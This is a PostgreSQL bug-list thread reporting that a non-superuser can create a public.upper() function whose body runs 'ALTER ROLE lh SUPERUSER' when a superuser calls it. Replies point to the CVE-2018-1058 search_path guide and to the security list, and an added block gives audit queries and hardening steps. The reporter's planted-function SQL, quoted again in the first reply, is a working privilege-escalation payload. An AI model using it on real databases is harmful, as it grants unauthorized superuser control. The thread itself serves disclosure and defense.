BUG #16448: Remote code execution vulnerability

Started by PG Bug reporting form, almost 6 years ago (3 messages, bugs)
#1 PG Bug reporting form
noreply@postgresql.org

The following bug has been logged on the website:

Bug reference: 16448
Logged by: yi Ding
Email address: abcxiaod@126.com
PostgreSQL version: 10.12
Operating system: linux
Description:

A common user created a function in the public space and added some
malicious code in the function. When other users with superuser rights call
this function, the malicious code will be executed, so as to achieve the
purpose of remote malicious code execution.

First, non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT 'lh'::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;

Second, superuser pg01 will execute the above statement after calling the
upper function, which will change user lh to a superuser.

#2 Heikki Linnakangas
heikki.linnakangas@enterprisedb.com
In reply to: PG Bug reporting form (#1)
Re: BUG #16448: Remote code execution vulnerability

On 18/05/2020 12:14, PG Bug reporting form wrote:

> The following bug has been logged on the website:
>
> Bug reference: 16448
> Logged by: yi Ding
> Email address: abcxiaod@126.com
> PostgreSQL version: 10.12
> Operating system: linux
> Description:
>
> A common user created a function in the public space and added some
> malicious code in the function. When other users with superuser rights call
> this function, the malicious code will be executed, so as to achieve the
> purpose of remote malicious code execution.
>
> First, non-superuser lh defines a function named upper, which contains
> the statement to modify user permissions.
> SQL:
> CREATE TABLE public.testlh AS SELECT 'lh'::varchar AS contents;
> CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
> ALTER ROLE lh SUPERUSER;
> SELECT pg_catalog.upper($1);
> $$ LANGUAGE SQL VOLATILE;
>
> Second, superuser pg01 will execute the above statement after calling the
> upper function, which will change user lh to a superuser.

See
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

- Heikki
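
An audit-and-harden sketch for the search_path issue this reply points to, as an added example that is not part of the thread or of the linked guide. It assumes it is run as a superuser in each affected database; the role names lh and pg01 are the ones from the report.

```sql
-- Added example: run per database, as a superuser.
-- Pin the session path first so the audit itself resolves only catalog objects.
SET search_path = pg_catalog, pg_temp;

-- 1. Functions outside the system schemas that share a name with a
--    pg_catalog function and are owned by a non-superuser role.
--    public.upper(varchar) from the report would be listed here.
SELECT n.nspname AS schema_name,
       p.proname AS function_name,
       pg_get_function_identity_arguments(p.oid) AS arguments,
       r.rolname AS owner
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
JOIN pg_roles r ON r.oid = p.proowner
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND NOT r.rolsuper
  AND EXISTS (SELECT 1
              FROM pg_proc s
              WHERE s.pronamespace = 'pg_catalog'::regnamespace
                AND s.proname = p.proname)
ORDER BY 1, 2;

-- 2. Non-superuser roles that can currently create objects in public
--    (directly or through the default grant to PUBLIC).
SELECT r.rolname
FROM pg_roles r
WHERE NOT r.rolsuper
  AND has_schema_privilege(r.oid, 'public', 'CREATE')
ORDER BY 1;

-- 3. Hardening: stop ordinary roles from creating objects in public,
--    and keep public out of the superuser's default search_path so an
--    unqualified upper(...) resolves to pg_catalog.upper.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
ALTER ROLE pg01 SET search_path = "$user";

-- Re-run query 2 afterwards: any role still listed holds CREATE on
-- public through a direct or inherited grant and needs its own REVOKE.
```

The ALTER ROLE setting takes effect in new sessions of pg01; functions already flagged by query 1 still have to be reviewed and dropped by hand.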

#3 David G. Johnston
david.g.johnston@gmail.com
In reply to: PG Bug reporting form (#1)
Re: BUG #16448: Remote code execution vulnerability

On Mon, May 18, 2020 at 2:41 AM PG Bug reporting form <noreply@postgresql.org> wrote:

> The following bug has been logged on the website:
>
> Bug reference: 16448
> Logged by: yi Ding
> Email address: abcxiaod@126.com
> PostgreSQL version: 10.12
> Operating system: linux
> Description:
>
> A common user created a function in the public space and added some
> malicious code in the function. When other users with superuser rights call
> this function, the malicious code will be executed, so as to achieve the
> purpose of remote malicious code execution.

The project respectfully requests that security related concerns be
reported to the security list as opposed to the public bug report listing.

https://www.postgresql.org/support/

security@postgresql.org

David J.